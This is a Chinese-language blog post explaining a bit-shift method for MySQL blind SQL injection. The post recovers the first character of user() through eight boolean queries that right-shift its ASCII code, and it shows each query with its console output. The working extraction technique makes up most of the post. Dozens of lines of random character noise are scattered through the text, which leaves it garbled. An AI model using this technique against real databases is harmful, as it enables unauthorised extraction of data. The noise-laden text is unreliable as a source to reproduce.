关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
4 O, ~$ K5 u0 ^1 P) |8 l) M
! [- J; _, z$ b$ M$ P7 K

下面将以查询mysql数据库当中user()的第一位为例:
- }' i$ ^( D8 K+ ]. R


! b; ~5 ]4 D' J! }, hps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)


4 K- A5 e3 B# k  x, A& k: O4 t( x9 e+ z
2 ?0 n0 C) g( L" d/ K首先执行如下sql语句:
- Q5 x4 T9 T; d, [( q# A+ _
% X: l- P1 u9 c; W6 e: @
" j; n. M& f5 r% Z5 R$ L4 p9 Z) H$ b' q* g
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
+ G: R1 x. e7 Y2 x+ `6 X
  R7 K7 ~* e  o  }; ^& E( u2 W' {

我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
5 o! i0 G. d- \) D2 q


" T4 T5 Z( Q6 X4 }第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1

2 E  D1 A& A  r0 x: `: \$ H$ G
9 H5 m( A! j* M/ o" l- K: b* \6 {1 g# q2 O
7 U5 Z7 f( J) B如果运算结果为1,说明第一位为0,不为1

8 K( a0 R$ k9 q' R$ I

6 c) W0 {* D$ S$ E/ D4 Q  w+————————————–+
  O) W) }' Q4 [
| (ascii((substr(user(),1,1))) >> 7)=0 |

+————————————–+

| 1 |
6 I& r$ B6 V3 G5 ^2 X2 @" r
+————————————–+

1 row in set (0.00 sec)
7 O% e, `) D5 m9 }% P: c' [
这样我们就确定这个8bit的ascii的第一位为0
/ ^+ b% W0 [# g! d' Y0 b" K
- S7 d/ D- Y+ f0 o3 E- W
# g( x2 c" j) u/ T) e* `
第二次我们来做6次右偏移来确定前两位
3 }( B8 I+ D  ?+ U; }; I# S+ `
# k& P! `3 s0 K3 |  N) Y: n

前两位可能是01或00,即依然可以与0做比较,

: ~" K3 j+ b1 a: c, omysql> select (ascii((substr(user(),1,1))) >> 6)=0;

6 X" ~) |+ ~) A+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |
' }7 i$ R! i' H! T+ r
+————————————–+
! t# D3 a! o7 N' v  p
| 0 |
( v+ F3 n# R3 B
+————————————–+

1 row in set (0.00 sec)



  C7 }. U5 ~! O+ c9 {! h6 v结果为0,即第二位为1

, I) _) Q5 |% g9 |3 K- `: f
5 `; j. x" \2 W2 R" z; r1 }
. ]1 v7 V4 B* R8 d3 N+ H* M开始猜测前三位为010或011
- K' `+ m# }) N$ N
' b2 m0 R% s; \1 E0 T

9 J! Z& c0 Z$ L' s( l+ ]让我们看看010和011的ascii码是多少


5 J, o( l, E+ H2 S; T
分别查询select b’011′ select b’010′
- N. u& T% `# o


% v* I. b' f* D/ d" I: q0 h获得结果 010 = 2 011 = 3

) c) q/ ^- }; n$ s

* g! h! Z7 J0 P2 l, p执行如下sql:

+ C$ I* \- ?4 o1 d$ G. {0 U! O
& [$ M3 s& w! |% d* e* W) K' O2 \/ l- Y
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
+ |8 E. k& J% N/ b, j8 a" H% ^
+————————————–+
% v7 L) s% R) P1 T1 B
| (ascii((substr(user(),1,1))) >> 5)=2 |
, |  G$ D$ m7 i3 t7 l' ^) l
+————————————–+

3 `+ W2 Z4 a4 m0 i; ^| 0 |

" U# G- P- X' G6 g6 z2 W) C9 z+————————————–+

* P$ K  ]8 S% v即前三位不为010,而是011
# v! ^/ B  s+ S2 G+ Z

" U0 l# Z0 C  v" y4 Q% G
直到获得最后一位

" W6 j# u, t' C

最终结果为:01110010
* k3 D9 f2 a; T( X& r: J- U( p; e
  h2 E: P: d$ P; D: l1 @" `" ^+ ]
: z' P9 `9 [* r& P# i
转换一下:
, d- D9 N$ w/ `. ?
8 P. a8 s1 R! a" L
6 r' W! W, R6 h4 b' ]
) V  \  S* J3 H) |select b’01110010′
$ u1 t% m' p, ~% P; _% a  h; d

8 D! z) p5 s- i6 n) r3 O' v
查询结果
8 z+ A: s' a8 J2 C3 P# j
0 ^5 |, v8 b) }  h( t
7 C9 t0 p" x: r" w* _
+————-+
3 U7 F) B9 Z' h- @
% X- a- ]/ D: o| b’01110010′ |

+————-+

| r |

+————-+
( ?4 y# S2 D9 x5 Q
7 t6 I) b( V+ q+ W$ q1 row in set (0.00 sec)
  D; L! `+ N1 V. C6 N! x6 G) ]) p

' n. V; p  ?/ m) u7 _
这样我们就获得了user()的第一位.其它位依此类推

) l1 L1 J; ]' h* i/ s* P& |